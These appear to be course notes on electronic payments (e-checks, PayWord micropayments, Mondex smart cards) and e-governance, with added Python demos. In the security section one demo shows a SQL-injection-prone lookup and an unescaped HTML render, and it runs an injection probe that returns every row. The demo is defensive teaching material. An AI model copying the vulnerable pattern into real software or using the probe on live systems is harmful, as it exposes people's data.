1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the echeck, and the public key is the key given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize the electronic debit and enters the bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
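Two of the checks that appear in the material above, step 4 of the CyberSource flow (the routing number is validated) and item 2 of the protection list (duplicate detection of scanned checks), as working code. This is an added example, not code from the notes, from CyberSource or from any processor. The routing-number rule it applies is the standard ABA checksum (nine digits, weighted 3-7-1 repeating, sum divisible by 10); the account numbers, check numbers and the routing number 123456780 are constructed sample values, and the fingerprint scheme for spotting a check submitted twice is an assumption of the example.

```python
"""Constructed example: ABA routing-number checksum and duplicate-check detection
at the point where scanned e-checks enter a merchant's processing queue."""
import hashlib
from decimal import Decimal


def routing_number_valid(aba: str) -> bool:
    """ABA routing numbers are nine digits whose weighted sum (weights 3,7,1 repeating)
    is divisible by 10. Rejects anything that is not exactly nine digits."""
    if len(aba) != 9 or not aba.isdigit():
        return False
    weights = (3, 7, 1, 3, 7, 1, 3, 7, 1)
    return sum(int(d) * w for d, w in zip(aba, weights)) % 10 == 0


def check_fingerprint(routing: str, account: str, check_number: str, amount: str) -> str:
    """Stable identifier for one scanned check: the same paper check scanned twice
    produces the same fingerprint, so the second scan can be caught."""
    key = f"{routing}|{account}|{check_number}|{Decimal(amount):.2f}"
    return hashlib.sha256(key.encode()).hexdigest()


class ECheckIntake:
    """Validation and duplicate detection in front of ACH submission."""

    def __init__(self):
        self.seen = set()          # fingerprints of checks already accepted

    def submit(self, routing: str, account: str, check_number: str, amount: str) -> str:
        """Returns 'approved', 'invalid_routing' or 'duplicate'."""
        if not routing_number_valid(routing):
            return "invalid_routing"
        fp = check_fingerprint(routing, account, check_number, amount)
        if fp in self.seen:
            return "duplicate"
        self.seen.add(fp)
        return "approved"


def demo():
    """Four constructed submissions: valid, the same check again, bad checksum, a new check."""
    intake = ECheckIntake()
    return [
        intake.submit("123456780", "000123456789", "1042", "125.00"),   # checksum 150 -> valid
        intake.submit("123456780", "000123456789", "1042", "125.00"),   # same check scanned twice
        intake.submit("123456789", "000123456789", "1043", "40.00"),    # checksum 159 -> invalid
        intake.submit("123456780", "000123456789", "1043", "40.00"),    # new check number -> new
    ]


if __name__ == "__main__":
    print(demo())   # ['approved', 'duplicate', 'invalid_routing', 'approved']
```

The checksum only catches transcription errors, not a wrong-but-well-formed routing number; the account-history verification in step 4 is what a processor adds on top, and it is not modelled here.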

Four Different Scenarios of the FSTC E-check System (figure)

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

- Millicent (pre-payment/credit based)
- PayWord (post-payment)

MICRO PAYMENT IS:

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- Alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks:

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small sums, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.
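How "many small transactions are summarised and charged in one bill" can be made verifiable rather than taken on trust, illustrated with the post-payment scheme the notes list under micropayment methods (PayWord, by Rivest and Shamir): the customer commits to the root of a hash chain, each click reveals the next element, and the vendor settles once with a single (payword, count) pair. This is an added example, not code from the notes or from any PayWord implementation; the chain length, unit price and the omission of the signed commitment certificate that real PayWord puts around the root are assumptions made for the demo.

```python
"""Constructed example: PayWord-style hash-chain micropayments.

Customer: picks random w_n and computes w_i = H(w_{i+1}) down to w_0.
Vendor:   stores the commitment w_0; payment k is w_k, valid iff H(w_k) == w_{k-1}.
Settlement happens once, with the last payword and the count, not per click.
"""
import hashlib
import secrets


def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(n: int) -> list:
    """Return [w_0, w_1, ..., w_n] with w_i = H(w_{i+1}); w_0 is the commitment."""
    chain = [secrets.token_bytes(32)]          # w_n, the secret end of the chain
    for _ in range(n):
        chain.append(h(chain[-1]))
    chain.reverse()                            # chain[0] == w_0 (root), chain[n] == w_n
    return chain


class Vendor:
    """Accepts paywords one at a time and totals them for a single later bill."""

    def __init__(self, commitment: bytes, unit_price_cents: int):
        self.last = commitment
        self.count = 0
        self.unit_price = unit_price_cents

    def accept(self, payword: bytes) -> bool:
        """Valid only if it hashes to the last accepted word: no replay, no skipping ahead."""
        if h(payword) != self.last:
            return False
        self.last = payword
        self.count += 1
        return True

    def bill_cents(self) -> int:
        return self.count * self.unit_price

    def settlement(self) -> tuple:
        """What the vendor forwards to the broker once: (last payword, how many units)."""
        return self.last, self.count


def verify_settlement(commitment: bytes, last: bytes, count: int) -> bool:
    """Broker side: hashing the last payword `count` times must reach the commitment."""
    x = last
    for _ in range(count):
        x = h(x)
    return x == commitment


def demo(n: int = 5, pays: int = 3):
    """Spend `pays` units of a chain of length `n`, then try a replay and a skip."""
    chain = make_chain(n)
    vendor = Vendor(chain[0], unit_price_cents=2)
    accepted = [vendor.accept(chain[i]) for i in range(1, pays + 1)]
    replay = vendor.accept(chain[pays])        # same payword again
    skip = vendor.accept(chain[pays + 2])      # two ahead of the last accepted one
    last, count = vendor.settlement()
    return accepted, replay, skip, vendor.bill_cents(), verify_settlement(chain[0], last, count)


if __name__ == "__main__":
    print(demo())   # ([True, True, True], False, False, 6, True)
```

Each payword costs the vendor one hash to check, and the broker sees one settlement per customer-vendor pair instead of one transaction per click, which is exactly the per-transaction cost the paragraph above says micropayments have to avoid.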

Payment options:

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

- Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
- Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
- Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
- Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and Mastercard SecureCode).
- Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment uses:

- Publishing
- Marketing
- Software
- Entertainment
- Web services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a smart card?

- Standard credit card-sized, with a microchip embedded on it
- Two types: memory-only chips and microprocessor chips
- Can hold up to 32,000 bytes
- Newer smart cards have math co-processors, which perform complex encryption routines quickly
- In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards (figure)

Why smart cards?

- Improve the convenience and security of any transaction
- Provide tamper-proof storage of user and account identity
- Provide vital components of system security
- Protect against a full range of security threats

Advantages:

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card (figure)

Smart card processing (figure)

Smart Card Applications:

- Ticketless travel
  - Seoul bus system: 4M cards, 1B transactions since 1996
  - Planned for the SF Bay Area system
- Authentication, ID
- Medical records
- Ecash
- Store loyalty programs
- Personal profiles
- Government
- Licenses
- Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Features:

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keeps transaction records
- Password protection and "lock card" functions
- Portable balance finder to check the balance
- Supports multiple currencies

ADVANTAGES

CONSUMER:

- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT:

- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION:

- Strengthen customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex protect privacy?

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information:

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information:

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information:

o firewalls in Multos, between applications (ITSEC 6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
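The rolling 10-transaction log and its overflow are the crux of the auditability critique above. The simulation below is an added example for these notes, not Mondex code: the Purse class, its 10-entry log and the bank-side reconcile check are constructed to show that value stays conserved between cards during offline transfers, while the bank loses the ability to explain a balance once older log entries have been overwritten.

```python
"""Simulation of a Mondex-style stored-value purse with a rolling
10-entry transaction log.  Added example for these notes, not Mondex
code; class, field and function names are constructed."""
from collections import deque
from dataclasses import dataclass, field
from itertools import count

LOG_DEPTH = 10         # the "rolling 10 transactions" kept on the chip
_serial = count(1)     # constructed source of unique card identification numbers


@dataclass
class Purse:
    holder: str
    balance: int = 0                                   # value held, in cents
    card_id: int = field(default_factory=lambda: next(_serial))
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_DEPTH))
    dropped: int = 0                                   # entries lost to overflow

    def _record(self, kind, amount, counterparty):
        # deque(maxlen=10) silently discards the oldest entry once full;
        # count those so the bank-side check can tell the log is incomplete.
        if len(self.log) == self.log.maxlen:
            self.dropped += 1
        self.log.append((kind, amount, counterparty))

    def load(self, amount):
        """Online load from the holder's bank account onto the card."""
        if amount <= 0:
            raise ValueError("load amount must be positive")
        self.balance += amount
        self._record("load", amount, "bank")

    def pay(self, payee, amount):
        """Offline card-to-card transfer: no bank contact, value moves
        directly and both chips log the exact amount and counterparty."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient purse value")
        self.balance -= amount
        payee.balance += amount
        self._record("spend", amount, payee.holder)
        payee._record("receive", amount, self.holder)


def reconcile(purse):
    """Bank-side check run when the card next goes online (ATM or
    retailer upload).  Returns (complete, unexplained): with an intact
    log every cent of the balance is accounted for; once entries have
    overflowed the bank can no longer explain it, which is the
    auditability gap the critics describe."""
    def total(kind):
        return sum(a for k, a, _ in purse.log if k == kind)
    expected = total("load") + total("receive") - total("spend")
    unexplained = purse.balance - expected
    complete = purse.dropped == 0 and unexplained == 0
    return complete, unexplained


if __name__ == "__main__":
    alice, shop = Purse("alice"), Purse("shop")
    alice.load(5000)
    for _ in range(11):          # 12 log entries > LOG_DEPTH, so 2 are lost
        alice.pay(shop, 100)
    print(alice.balance + shop.balance, reconcile(alice))
```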

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration – combined with organizational change and new skills – to improve public services and democratic processes and to strengthen support to the public. The problem with making this definition congruent with a definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached that individual. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA – it is a location-transparent, language-independent, implementation-independent and operating-system-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies carry significant weight, public-key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) – Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) – Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally but not always involving:

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private

– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management –

Six Distinct Phases

Genesis

What's the need?

What's driving the need / rationale?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract / Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend also to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS; and

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication – capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization – capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality – capability to prevent unauthorized access to information.

Integrity – capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability – capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation – capability to prevent the person or system taking part in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

Continually improve its control environment;

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
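To make the two vulnerabilities named above concrete, here is an added example (not code from any e-Government site or from the cited research): a constructed in-memory application table, a lookup built by string concatenation beside its parameterized form, and a page fragment rendered with and without HTML escaping.

```python
"""Vulnerable versus hardened handling of citizen-supplied input in a
portal lookup.  Added example for these notes, not code from any
e-Government site or from the cited study; the application table and
its rows are constructed."""
import html
import sqlite3


def make_db():
    """Constructed in-memory table: one application record per citizen."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE application (ref TEXT, owner TEXT, status TEXT)")
    conn.executemany(
        "INSERT INTO application VALUES (?, ?, ?)",
        [("A-1001", "alice", "approved"), ("A-1002", "bob", "pending")],
    )
    return conn


def lookup_unsafe(conn, owner):
    """String concatenation: the input becomes part of the SQL text, so a
    quote inside it changes the query instead of being compared as data."""
    sql = "SELECT ref, status FROM application WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, owner):
    """Parameter binding: the driver keeps the input as a value, so the
    same input is just an owner name that matches no row."""
    sql = "SELECT ref, status FROM application WHERE owner = ?"
    return conn.execute(sql, (owner,)).fetchall()


def render_unsafe(name):
    """Reflects the name into HTML untouched (the XSS pattern)."""
    return "<p>Welcome, " + name + "</p>"


def render_safe(name):
    """Escapes <, >, & and both quote characters so the browser displays
    the text verbatim instead of interpreting it as markup."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"             # constructed input containing a quote
    print(lookup_unsafe(db, probe))   # every row: the WHERE clause is rewritten
    print(lookup_safe(db, probe))     # []: treated as a literal owner name
    print(render_safe("<script>x</script>"))
```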

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

